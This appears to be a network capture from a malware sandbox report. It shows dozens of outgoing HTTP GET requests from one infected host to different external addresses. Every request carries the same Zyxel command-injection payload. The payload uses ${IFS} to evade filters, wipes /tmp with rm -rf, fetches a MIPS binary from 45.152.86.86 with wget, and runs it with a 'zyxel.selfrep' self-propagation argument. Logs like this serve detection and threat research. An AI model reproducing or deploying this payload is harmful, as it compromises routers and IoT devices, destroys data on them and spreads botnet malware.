                                        Mar 31, 2024 09:21:54.299333096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6277192.168.2.2357174179.249.222.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299377918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6278192.168.2.233594417.71.29.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299413919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6279192.168.2.233367266.165.29.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299467087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6280192.168.2.235293419.128.96.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299511909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6281192.168.2.2346218216.0.79.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299545050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6282192.168.2.2356154129.140.117.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299587965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6283192.168.2.23335348.108.249.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299638033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6284192.168.2.2356898140.54.239.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299681902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6285192.168.2.2357966222.64.20.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299726963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6286192.168.2.2351260117.170.120.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299799919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6287192.168.2.2334304188.36.196.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299829960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6288192.168.2.233780078.212.123.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299868107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6289192.168.2.235430036.108.133.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299897909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6290192.168.2.236082069.230.185.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299946070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6291192.168.2.234385850.177.46.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299978971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6292192.168.2.234657231.172.144.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300019026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6293192.168.2.234863866.104.127.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300057888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6294192.168.2.2334286206.3.127.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300112963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6295192.168.2.2354668142.119.152.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300158024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6296192.168.2.2352426113.187.201.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300210953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6297192.168.2.2349660155.69.87.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300247908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6298192.168.2.23524568.123.242.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300302029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6299192.168.2.2359292166.149.215.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300332069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6300192.168.2.2337574187.219.117.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300381899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6301192.168.2.23494528.93.209.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300414085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6302192.168.2.2360738137.77.247.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300452948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6303192.168.2.235256498.97.93.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300493002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6304192.168.2.2355042122.4.198.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300535917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6305192.168.2.233579414.245.242.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300587893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6306192.168.2.2352312147.213.2.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300625086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6307192.168.2.2355640207.88.245.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300667048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6308192.168.2.235639475.82.86.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300718069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6309192.168.2.2350592171.96.250.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300766945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6310192.168.2.234952046.73.161.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300808907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6311192.168.2.2337664110.154.250.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300847054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6312192.168.2.2354962168.189.155.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300904036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6313192.168.2.235133424.196.156.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.300966024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6314192.168.2.235123014.98.67.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301001072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6315192.168.2.236055483.213.68.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301042080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6316192.168.2.2345938190.111.249.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301091909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6317192.168.2.235448866.19.1.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301126957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6318192.168.2.234873471.41.121.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301175117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6319192.168.2.2347542182.217.230.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301211119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6320192.168.2.234821017.46.39.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301254988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6321192.168.2.2345984147.16.107.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301299095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6322192.168.2.2354044129.159.233.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301350117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6323192.168.2.234579642.213.109.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301386118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6324192.168.2.2356766101.182.146.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301434040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6325192.168.2.2359166168.241.76.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301466942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6326192.168.2.2357840151.175.94.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301517010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6327192.168.2.233439437.67.76.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301541090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6328192.168.2.2341322155.152.54.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301601887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6329192.168.2.23371369.128.95.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301647902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6330192.168.2.2355050128.77.134.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301687002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6331192.168.2.234815231.180.16.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301739931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6332192.168.2.235327690.71.222.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301790953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6333192.168.2.2347852100.35.24.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301826000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6334192.168.2.2333594181.254.213.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301858902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6335192.168.2.234947273.13.87.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301911116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6336192.168.2.2360246136.181.114.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.301955938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6337192.168.2.235270093.22.132.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302005053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6338192.168.2.235620674.188.63.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302052021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6339192.168.2.235216246.96.80.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302090883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6340192.168.2.236089450.134.206.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302135944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6341192.168.2.235436654.38.182.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302172899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6342192.168.2.2345612147.103.68.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302226067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6343192.168.2.2353990203.108.88.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302277088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6344192.168.2.234325671.239.48.41443
                                        TimestampBytes transferredDirectionData
